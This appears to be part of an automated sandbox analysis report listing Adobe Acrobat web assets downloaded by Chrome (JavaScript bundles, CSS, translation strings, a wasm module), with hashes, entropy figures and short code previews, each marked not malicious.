                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2345],{aPRU:(n,e,a)=>{"use strict";a.r(e),a.d(e,{default:()=>t});var r=a("cOr2"),o=a.n(r),s=a("yGwj"),i=a.n(s)()(o());i.push([n.id,'.CIB44a_i18nFontFamily {\n font-synthesis: weight;\n font-family: adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(ar) {\n font-family: myriad-arabic, adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(he) {\n font-family: myriad-hebrew, adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(zh) {\n font-family: adobe-clean-han-traditional, source-han-traditional, MingLiu, Heiti TC Light, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(zh-Hans) {\n f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (18931)
                                                      Category:downloaded
                                                      Size (bytes):19023
                                                      Entropy (8bit):5.284617920155703
                                                      Encrypted:false
                                                      SSDEEP:384:OFHxe21fHvHR1E+5awrHFI+HXrSxgsrjutI3w3pJi4k:OFHxe21fHvHR1d5h6+HXrSxgsrjH+C4k
                                                      MD5:793E74A1537E1E8E3C4439937630DF67
                                                      SHA1:FBB18F02D43E97BD36D966457B081ED97A8A0BAE
                                                      SHA-256:0A4B76A26B20D220FAD5984AF5F4D3CB807C2E0308EAD6A96CF54FA4BB7A4FCD
                                                      SHA-512:1B93E4920C52F651E78E6A6A9FCD3EB0B88F6940BBDF359CE348730F5700FF7B8E135E6E7711710E93072B3B5C0201492E473350B1D5236C8562B1ABAACCDADA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/vendors-node_modules_cchome_ingest-react_index_js.fd95c5dbb8ec4999b767.bundle.js
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */.(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["vendors-node_modules_cchome_ingest-react_index_js"],{780:(t,e,s)=>{"use strict";const i=s(153);t.exports=i},153:t=>{var e;self,e=()=>(()=>{var t={687:(t,e,s)=>{"use strict";const i=s(170);t.exports=i},170:(t,e,s)=>{"use strict";s.r(e),s.d(e,{default:()=>l});var i=s(877),n=s.n(i);const o=new class{constructor(){}debug(){if(window.logLevel&&window.logLevel>=4){var t=Array.prototype.slice.call(arguments);console.debug.apply(console,t)}}error(){if(!window.logLevel||0!==window.logLevel){var t=Array.prototype.slice.call(arguments);console.error.apply(console,t)}}warn(){if(window.logLevel&&window.logLevel>=2){var t=Array.prototype.slice.call(arguments);console.warn.apply(console,t)}}log(){if(window.logLevel&&window.logLevel>=3){var t=Array.prototype.slice.call(arguments);console.info.apply(console,t)}}info(){if(window.logLevel&
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (50118)
                                                      Category:downloaded
                                                      Size (bytes):50191
                                                      Entropy (8bit):5.73249254202592
                                                      Encrypted:false
                                                      SSDEEP:768:Yzm05g45GmmRFMIBhuFcM/w+JNtbmCitucsSzpqZ/n4ngqu+XeWZto8kWjp6WTzA:E5g43ehAtuAOeAo5W95TbKA9l/Dah
                                                      MD5:6F81B59155E039ADC3D708E5458E7948
                                                      SHA1:FC7162A89A433AEDCAF731A7E9A5E82E30D47CF7
                                                      SHA-256:22207A4FA39350C6159F2FBD728FFB1AEFB7329345876C6BDD00337CDCC67FB8
                                                      SHA-512:B512E0A0277BFFA31E848938FEF9007901C6460C77EB830655827652D3E6EA1819C01652B39AB11CAB8D31C4ADE41F1FCB6823AF525E6AC70F455B6BEE246B1D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/commentingVerbs-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[8632],{SV1a:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>CommentTextBoxVerb});var o=n("D/Yr"),i=n("cfWR"),r=n("7I0s"),l=n("pUtt"),s=n("iaHC"),c=n("YY8+");class CommentTextBoxVerb{static getInstance(){return CommentTextBoxVerb._instance||(CommentTextBoxVerb._instance=new CommentTextBoxVerb),CommentTextBoxVerb._instance}exitCallback(){c.A.resetSelectedTool()}initializeAction(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};(0,l.default)(e)}getPlacement(){return o.A.CONTEXT_MENU_PLACEMENT_PRE_HEADER}executeAction(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};const t=s.A.commentTextBoxObject,n=Object.assign(Object.assign({},e),{textValue:t.textValue}),l=t.contextMenuPosition;if(e.triggerType===o.A.RIGHT_CLICK&&(e.clickPoint.x!==l.left||e.clickPoint.y!==l.top)){const n=Object.assign(Object.assign({},t),{contextMenuPosition:{left:e.clickPoint.x,top:e.clickPoint.y}});s.A.setCommen
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (46766)
                                                      Category:downloaded
                                                      Size (bytes):46828
                                                      Entropy (8bit):5.92170246281835
                                                      Encrypted:false
                                                      SSDEEP:768:/sIytqCOXKRNVdYksKXS4BVHGLr8+kI89AYYlQTVODyX3tOfu9vS:/sIytqCOaTFiwGg9AllQB2Q9OfEK
                                                      MD5:B86D956DBB58F4DB5646037074CB8C9B
                                                      SHA1:A06E406FB6CA6521C0C5921EA503358B15689144
                                                      SHA-256:A32212C231693318C3C4617FAB5EF84651BAD277D5211D2DB91D3FF0A5BF385E
                                                      SHA-512:50A049D438DC7778AB88EA921E760F76A6D0BF2385EEE06B9D4464F0CD5A573F2249BFD0FEB8B60564C16EE2C3F3E756ABAD4A6BAAF867DF647E6F064DE491A6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/printHelper_main.fe9e0a8b.js
                                                      Preview:var printHelper;(()=>{var e={"7gGk":(e,i,t)=>{var r,o=function(){var e=String.fromCharCode,i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",r={};function getBaseValue(e,i){if(!r[e]){r[e]={};for(var t=0;t<e.length;t++)r[e][e.charAt(t)]=t}return r[e][i]}var o={compressToBase64:function(e){if(null==e)return"";var t=o._compress(e,6,(function(e){return i.charAt(e)}));switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(e){return null==e?"":""==e?null:o._decompress(e.length,32,(function(t){return getBaseValue(i,e.charAt(t))}))},compressToUTF16:function(i){return null==i?"":o._compress(i,15,(function(i){return e(i+32)}))+" "},decompressFromUTF16:function(e){return null==e?"":""==e?null:o._decompress(e.length,16384,(function(i){return e.charCodeAt(i)-32}))},compressToUint8Array:function(e){for(var i=o.compress(e),t=new U
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (2122)
                                                      Category:downloaded
                                                      Size (bytes):2214
                                                      Entropy (8bit):4.984099482014231
                                                      Encrypted:false
                                                      SSDEEP:48:544bTEgqj8E0DE0ENX4rE1jMNzaEx2E8ww5u8ktPtrGFffHACF:54GEgqj8EQE0EGrE2aE0E8wkktPtrep
                                                      MD5:AC59F66203923A18CD33ED6D69551CAB
                                                      SHA1:4A930D4D9293C31123AD0B1356E7944964B281BC
                                                      SHA-256:47681078BFCC09E2D1C6417DAA655D78C1125A79895467C03CD0C58A1792C046
                                                      SHA-512:AE52699C9C1926E29E644561AFCDC97B916CD1351A5218586F52CDBF26ABB79328AE5FF7471745777364DF6E33CA1CEFAE95D2BF5FF91F2B2654A11376E397B5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/validator.e01d2a342312f0b605aa.bundle.js
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["validator"],{239:(r,n,a)=>{a.r(n),a.d(n,{default:()=>e});const e=function(r){if(!r)throw new Error("UniversalNav: config is mandatory");var n=r.analyticsContext;if(!n)throw new Error("UniversalNav: analyticsContext is mandatory");if(!0!==n.disableEvents){if(!n.consumer)throw new Error("UniversalNav: analyticsContext.consumer is mandatory");if(!n.consumer.name)throw new Error("UniversalNav: analyticsContext.consumer.name is mandatory");if(!n.consumer.version)throw new Error("UniversalNav: analyticsContext.consumer.version is mandatory");if(!["Web","Desktop","Mobile"].includes(n.consumer.platform))throw new Error("UniversalNav: analyticsContext.consumer.platform is invalid");if(!["macOS","windows","linux","chromeOS","android","iOS","iPadOS","na"].includes(n.consumer.device))throw new Error("UniversalNav: analy
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48135)
                                                      Category:downloaded
                                                      Size (bytes):48190
                                                      Entropy (8bit):5.398013925479974
                                                      Encrypted:false
                                                      SSDEEP:768:DqhRkDx25WxEWpy7Ne9xJCETRauwX/N4X7G/XxXQVq/Pkan5bh8RAGuQil9poVk4:DhF25WxEWp9CyRaRPNc7G/XxXQ+Fn+Ce
                                                      MD5:35EFE12BC02CA61F885F1DA1312E1EB7
                                                      SHA1:CB8A36241708983BDE37CAC5CE4E630136A751F3
                                                      SHA-256:9D9C9C69E40BC30CE172151AFE09555016704BB89665117E1409C7B93DB89C65
                                                      SHA-512:D2201CBC8C9336296F9500BFC25328A37C783CA8801D59D0549F692BD8C7F63199C47101B8C413C078CE7302BB90EEE4691125F62E758BBEB00627ABBEADAB71
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-send-dropin/3.22.1_6.298.0/sendProvider-chunk.js
                                                      Preview:(self["webpackJsonp-send"]=self["webpackJsonp-send"]||[]).push([[658],{HwaR:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n=function(){function defineProperties(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,r){return t&&defineProperties(e.prototype,t),r&&defineProperties(e,r),e}}(),o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("JmJ7")),s=r("Gcvr");var a=function(){function Client(){!function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,Client),this._imsData=null,this._environment="stage",this._apiKey=null,this._assetData=null,this._tags={}}return n(Client,[{key:"configure",value:function configure(e){var t=e.apiKey,r=e.assetData,n=e.environment,o=e.imsData,a=e.tags,i=e.token;return o&&(this._imsData=o),n&&(this.setEnvironment(n),this._endpo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (28470)
                                                      Category:downloaded
                                                      Size (bytes):28535
                                                      Entropy (8bit):5.352324910239959
                                                      Encrypted:false
                                                      SSDEEP:768:3ngBsiJWL/x9jtFDswc6axdhWGbbdcaWBVtjiYTgWk0i:naRPB0LK
                                                      MD5:400E7D1AE271728540D4A8B73C7DD7EB
                                                      SHA1:FA021152DCB2988C648628A4B67D6BCC837725F8
                                                      SHA-256:C94F3CA752B2CA95929475B7F1713EDBE1FC836361C7E6CD4560BB2DAA35B35B
                                                      SHA-512:EFD63440996810D854AE53E35D7654FE799969241FBF6DA9E0A24C1D8438A5815B6C88797D8E96E5782F22010A69491823B1D428DA6A5E3EFB90E0C27D0ECC5E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-sign-authoring2-dropin/3.59.4_4.1111.0/pdf-request-signatures-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-sign-authoring2"]=self["webpackJsonp-sign-authoring2"]||[]).push([[4701],{Kdnz:function(e,t,i){i.d(t,{g:function(){return withLocalization}});var n=i("plsW"),o=i("YWiy"),r=i("Zm2D"),s=i("bon+");const withLocalization=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:s.Z;return t=>{var i;return(i=class WithLocalization extends o.Component{constructor(t){super(t),this.loadMessages=async()=>{const t=n.locale2.getLocale(),i=await e(t);this.setState({messages:i,userLocale:t})},this.loadMessages(),this.state={messages:globalThis.adobe_dc_sdk.authoringMessages,userLocale:n.locale2.getLocale()}}render(){const{messages:e,userLocale:i}=this.state;return e&&i?o.createElement(r.IntlProvider,{messages:e,locale:i},o.createElement(t,this.props)):null}}).WrappedComponent=t,i}}},"7pbj":function(e,t,i){i.r(t),i.d(t,{default:function(){return K}});var n=i("plsW"),o=i("Fuzs"),r=i("WCAd"),s=i("ZE7a"),a=i("BbF9"),l=i("IelE"),d=i("Kvo4"),c=i("7MNv"),__aw
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (29396), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):29414
                                                      Entropy (8bit):4.778763300401465
                                                      Encrypted:false
                                                      SSDEEP:384:3w3W+7rMHIsxOq7qU828QuavH8SJmIZuwJAKfIKe1KRHygZ:g3W+sosxOq7qBebJm5wJAKfIKe1ro
                                                      MD5:2B9825A2BAA540CCED0AE207AC788444
                                                      SHA1:C2EA180B0BF406E2F3D590D3CF418CADE23697D8
                                                      SHA-256:61BA07A58C2CCEF7430DF89DBC35450EB72D0D1C93C5D90A2414AFFEDD964EF9
                                                      SHA-512:7F1097FA013C220587A7BBE5C63E7E8973BA48F03D9B9CF12B46CFA3C97BE7E4A6092A489B70F119DD964538E859478E3701953FBC18661C021DE9E099D87D6A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1382.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-viewer"]=self["webpackJsonp-viewer"]||[]).push([[7818],{t39f:e=>{e.exports=JSON.parse('{"verb.editpdf.addImage.dialogTitle.addImage":"Add Image","verb.editpdf.too.many.files":"Only 1 file can be uploaded for editing at a time","default":" ","titlebar.branding":"Adobe cloud storage","topbar.redirect.yourDocuments":"Your documents","topbar.redirect.documentCloud":"Adobe cloud storage","topbar.redirect.cloudStorage":"Adobe cloud storage","topbar.redirect.yourFiles":"Your files","topbar.redirect.sharedByYou":"Shared by you","topbar.redirect.sharedByOthers":"Shared by others","modernviewer.tooltip.home":"Go to Acrobat Home","tooltip.back":"Back","tooltip.home":"Home","tooltip.contextBoard":"File details and tools","tooltip.shareContextBoard":"Share File","tooltip.shareButton":"Share","modernviewer.arialabel.home":"Go to Home page","arialabel.back":"Back","arialabel.home":"Home","arialabel.contextBoard":"File details and tools","arialabel.shareContextBoard":"
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (54731), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):54748
                                                      Entropy (8bit):4.720229335535071
                                                      Encrypted:false
                                                      SSDEEP:1536:nMcxRV3QDzB+WfclPSlbaiqLgqyR4hpTnuc/C2O9INpnL7gwdcyf8ksIdCRiRIJD:nMcxRV3QDzBWDUkBr4PCk
                                                      MD5:615CCF23B64C86DF2F36D1DF05DC2A80
                                                      SHA1:D9F3CB2E64D16C4F7633A247185F84BD2C760E83
                                                      SHA-256:013273D0FE8293CD508193E3D63061511ED8913A914CFD525314CC0F26979C57
                                                      SHA-512:624164AEBBF9D676BC8A8679D72BE24CBF4507C3D859449E32DA8D8C1E28AC9C9C580AF3ECE03D3C12C7508994F6522B444EE37BE9E75C7E2BF4BDFAAC6F8ACB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/translations-en-US-json.js
                                                      Preview:"use strict";(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7818],{R5i5:e=>{e.exports=JSON.parse('{"design-new-page.dropzone.heading.seo":"Design new pages for a PDF","combine.label.seo":"Merge PDFs","combine.dropzone.heading.seo":"Merge PDF files","combine.dropzone.description.seo":"Drag and drop PDFs to merge them into one file with our PDF combiner.","extractpages.dropzone.heading.seo":"Extract PDF pages","extractpages.dropzone.description.seo":"Drag and drop a PDF file, then extract pages from it.","deletepages.dropzone.heading.seo":"Delete PDF pages","deletepages.dropzone.description.seo":"Drag and drop a file, then remove pages from your PDF.","insertpages.dropzone.heading.seo":"Add pages to a PDF","organize.dropzone.heading.seo":"Organize Pages","rotatepages.dropzone.heading.seo":"Rotate PDF pages","rotatepages.dropzone.description.seo":"Drag and drop one or more PDFs, then rotate pages with our PDF rotator.","reorderpages.dropzone.heading.s
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (9369)
                                                      Category:downloaded
                                                      Size (bytes):9420
                                                      Entropy (8bit):5.293342408156369
                                                      Encrypted:false
                                                      SSDEEP:192:YqwTj+QMR3zxO2OdfFD7dojI+WdoqdJjvjLpaIzan45UvYTgVNh9g9NAPnt8gw7X:ETic3jzzbb4o+YaUb
                                                      MD5:58F00995E668D9FF23D5357D19C3AA69
                                                      SHA1:437AA1C1E49374D7AA74D84AD10D32E80F66FA50
                                                      SHA-256:8F28CD38C05A5BCD785D5E5C5C3C04219355FF921CC2B5BCCD87748B09EB87CE
                                                      SHA-512:1E084F66994A2432D6DD4A0D70BE96A1E0608C01367A84684A602980880428549C1A5144ACFCF3BE387DEBF085B6C643693C062803896AB79968A56D3A907009
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1347.0/platform-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="29163fa5-73d5-4ac7-a223-4c3307793dcb",e._sentryDebugIdIdentifier="sentry-dbid-29163fa5-73d5-4ac7-a223-4c3307793dcb")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"83b9488d5bb7830d24a07d05c562ad0e9ff36b58"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[7745],{OR70:(e,t,o)=>{"use strict";o.r(t),o.d(t,{default:()=>m});var i=o("plsW"),r=o("4PKp");function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),o.push.apply(o,i)}return o}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (28278)
                                                      Category:downloaded
                                                      Size (bytes):28326
                                                      Entropy (8bit):4.29277345373752
                                                      Encrypted:false
                                                      SSDEEP:768:i2ceVIbeil2TwsJeil2TwkiT1IFBK69unoK:WSIbvgvyiTUSn
                                                      MD5:42DF9A5567C3C99560A1CCC28DF62476
                                                      SHA1:340F211624B18E5BA8992A3E3145A87DA14E556E
                                                      SHA-256:98EDDB8C9A965F96BD1518CC4547969C643D39AAA113A77A798828D742875911
                                                      SHA-512:42E9BE2A86872A97F0D9CB10639DCE3923E790323FDCB600B43C825835BC7251F0A2BBE97C04BE667D4F4E8CE8B3E32C658C37E6FBCDBBF65EF31845FF60C09B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/24-24-icons.js
                                                      Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[983,8819],{KltA:(C,e,l)=>{var t=l("YWiy");function A12CompressPDF24(C){return t.createElement("svg",C,t.createElement("g",{fill:"none",fillRule:"evenodd"},[t.createElement("path",{fill:"#26C0C7",fillRule:"nonzero",d:"M4 15.2088397L4 20.8450012C4 21.5634921 4.49946918 21.9479712 5.2040863 22L18.6710205 22C19.3889161 22 19.977064 21.4440134 20.0290488 20.7388111L20.0327839 20.6370968 20.0327839 15.2574463 21.0184021 16.1906128 20.9375 20.9234001C20.9375 22.0121426 20.0871333 22.9021045 19.0148759 22.9642845L18.894855 22.9677549 5.03627929 22.9697993C3.94844766 22.9697993 3.0592298 22.1187211 2.99710178 21.0455658L2.99363426 16.1906128 4 15.2088397zM5.09403947 1.00772415L15.6902478 1.00772415C16.0959934 1.00660343 16.4869268 1.15161604 16.7925771 1.4135829L16.8912052 1.50519679 20.5134541 4.97799158C20.8023297 5.2658521 20.9782179 5.64577867 21.0123241 6.04898909L21.0184021 6.18416057 21.0184021 7.90342508 20
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65502), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):420072
                                                      Entropy (8bit):5.126567749310819
                                                      Encrypted:false
                                                      SSDEEP:1536:8Rv27IdlsmkxXi0EJEbGdGQqGA70F9dfCN0DMB+8hDCtz7DM8EH6/Xrw0UfMDULf:gAeFKyHjQu0uur66mvs
                                                      MD5:6B246F5ECCC402432B1136C70122EF2C
                                                      SHA1:4ACC3217E2251E0C3DAFC93E308035A9741E67C9
                                                      SHA-256:FF3507E6486D3C3E789A547E0AAF8788D9C9726A111BBBD891EC173B2782543C
                                                      SHA-512:31DA130CA140F9C85E185016879FD323A530EF3E76CDCB7D6E31432E83B0D6066E25CC70F690CEFBE8761E6BB42C93E817301EBB37A75A0B831AD194F9CE03A7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-core/3.70.1/dc-spectrum-v3-core.css
                                                      Preview:.Dniwja_i18nFontFamily{font-synthesis:weight;font-family:adobe-clean,Source Sans Pro,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Ubuntu,Trebuchet MS,Lucida Grande,sans-serif}.Dniwja_i18nFontFamily:lang(ar){font-family:myriad-arabic,adobe-clean,Source Sans Pro,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Ubuntu,Trebuchet MS,Lucida Grande,sans-serif}.Dniwja_i18nFontFamily:lang(he){font-family:myriad-hebrew,adobe-clean,Source Sans Pro,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Ubuntu,Trebuchet MS,Lucida Grande,sans-serif}.Dniwja_i18nFontFamily:lang(zh){font-family:adobe-clean-han-traditional,source-han-traditional,MingLiu,Heiti TC Light,sans-serif}.Dniwja_i18nFontFamily:lang(zh-Hans){font-family:adobe-clean-han-simplified-c,source-han-simplified-c,SimSun,Heiti SC Light,sans-serif}.Dniwja_i18nFontFamily:lang(zh-Hant){font-family:adobe-clean-han-traditional,source-han-traditional,MingLiu,Microsoft JhengHei UI,Microsoft JhengHei,Heiti TC Light,sans-serif}.Dniwja_i18nFontFamily
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32732)
                                                      Category:downloaded
                                                      Size (bytes):301923
                                                      Entropy (8bit):5.381667298320789
                                                      Encrypted:false
                                                      SSDEEP:6144:2EtHw6Qf0WtecpxPsiHJhTAt2RpL3GTOnzqIEy9rq:2EtQ61uecbEiHnTAt2RM
                                                      MD5:CEC70F963BA513698C2826457663AD49
                                                      SHA1:97B262182E313E9DB0CB62DD1CD15A0052126CD6
                                                      SHA-256:A880A725C27D374F9F44451334A1658A76AC489CF28F057EB4888037AEC6084E
                                                      SHA-512:DE843E7335807B0F6F73BAC71C229B2591210264987E80C1ACE6BF4F1FE5980FA17421AD4556087B74A8FFAD923D70DEDF35EB8B43C2851EDF16C65CCDCCBE79
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://assets.adobedtm.com/d4d114c60e50/a0e989131fd5/launch-5dd5dd2177e6.min.js
                                                      Preview:// For license information, see `https://assets.adobedtm.com/d4d114c60e50/a0e989131fd5/launch-5dd5dd2177e6.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2025-03-18T10:03:25Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"EN256774c3100e437fa6cb9e6e2af16f4f",stage:"production"},dataElements:{"digitalData.primaryUser.primaryProfile.profileInfo":{storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e,t,n,o,a=window,r=a._satellite,i=r.getVar("_getNewRepeat"),s=r.getVar("_getDomain"),c=r.getVar("sha256"),d=r.getVar("serverTiming"),l=d&&"0"===d.sis,u="digitalData.primaryUser.primaryProfile.profileInfo",m="unknown",p="loggedOut";if(!(n=(t=r.DE=r.DE||{})[u])){if(o={authState:m,entitlementCreativeCloud:m,entitlementStatusCreativeCloud:m,returningStatus:i(365,"s_nr",s())},l)return o.authState=p,n=Promise.resolve(o),t[u]=n,n;(n=Promise.resolve
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                      Category:downloaded
                                                      Size (bytes):1757317
                                                      Entropy (8bit):5.837948791542105
                                                      Encrypted:false
                                                      SSDEEP:12288:P2N7KJO3kUKQqhFInVcVBory5kwp3kTMH/Qbmm5NCvSpeDRMn/LYjAgBjdazHdWP:jO3kdhwVUDHkkW5NkQ7n/L9gBjdazHdY
                                                      MD5:ADEB6D11685B5F33482C73653FABB8AE
                                                      SHA1:A874C8964C386B1EA37B1CFAC8F9065FBA37C306
                                                      SHA-256:8662E611EB16E565C4D6D6C52E74E0F0DD0B47A00D9052CD2136AE49262D37D7
                                                      SHA-512:A9913CE954B59A37132C040B4459D6D6C7654714C7F23A94F6CC4FAC99BDD3B273C9F84DC32AC6F3BC1034CFC968D18E7302F5F1B47F597528DE910DC42909B0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.da808d77def80dfa8f655b7312e9b57c.deferred.wasm
                                                      Preview:.asm.......U`...`....`....`.....`.....`......`......`.......`.......`........`.........`........`..`..~.`..........`...........`.........`..........`...`...~`..}..`...}`..}.`...~...`..}}..`...........`............`...}..`..}...`.}...`...~.`.....~..`..}}}}..`....~..`...}..`..~..`...}.`....}.`..~...`...~..`..~..~`..~.~`.....~`.....~~..`......~~..`.....|..`.............`.....}.`..}...`..}..`..|..`.~..`...~....`.....}}......`..}}.`..~`.}.}`..}}}}}}..`...}}..`.............`..|.`..............`.....~......`.....|......`...}}......`..~~..`...|..`.~~.~`....~....`...}}}...`....}`....~.~`.}}.}`..}}}.`......}}....`....||.....`..............}....`....}}..`.........................`...}.}`...|.|`..|`.}..`..}}..`..|...........R.primary._ZSt9terminatev...primary.free...primary.%wasm_acrobat_we.wasm.origa...primary.%wasm_acrobat_we.wasm.origb...primary.%wasm_acrobat_we.wasm.origc...primary.%wasm_acrobat_we.wasm.origd.6.primary.%wasm_acrobat_we.wasm.orige.E.primary.%wasm_acrobat_we.wasm.origf...primary
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (38249), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):38251
                                                      Entropy (8bit):4.760358714134354
                                                      Encrypted:false
                                                      SSDEEP:384:7a7tvfvOCQvZk6Ct4tkfljwKGwbkckxcw2zZh8AthvGi/xm/tXe3glI7t1cCvWOm:7a7tWjvRYuvokckxcvT84t1xEz0s4pZy
                                                      MD5:85F61DEBDF8A104A2192C5FED71C9377
                                                      SHA1:DA8145945D8E8D31D855AAD1FD66BB06BE852FF2
                                                      SHA-256:C6B1AF63E9DCA7488EF6D35EEE852A292C63EED504742671818526CE7B623AB5
                                                      SHA-512:0C4E1CFF6C1E9E79B81304401EA4FE62F8B0D248D0289527DAFCE7D248700E7BD0E4482032924FB14A06EEAB4FDED069390059A82985103871AD132D79F4CCEE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-sign-dropin/3.22.0_3.424.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-sign"]=self["webpackJsonp-sign"]||[]).push([[7818,3023],{R5i5:e=>{e.exports=JSON.parse('{"verb.fillsign.frictionless.description.seo":"Drag and drop a PDF to use the Acrobat PDF form filler.","verb.sendforsignature.frictionless.label.seo":"Send a PDF for signature","verb.sendforsignature.frictionless.description.seo":"Drag and drop a document, then request e-signatures by sending it to others for signing.","verb.sendforsignature.frictionless.mobile.description.seo":"Select a document, then send it to others to request e-signatures."}')},t39f:e=>{e.exports=JSON.parse('{"agreement_already_expired.APPROVER":"This document has expired and can no longer be approved.","agreement_already_expired.SIGNER":"This document has expired and can no longer be signed.","agreement_already_expired.DELEGATE_TO_SIGNER":"This document has expired and can no longer be signed.","agreement_already_expired.DELEGATE_TO_APPROVER":"This document has expired and can no longer be app
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
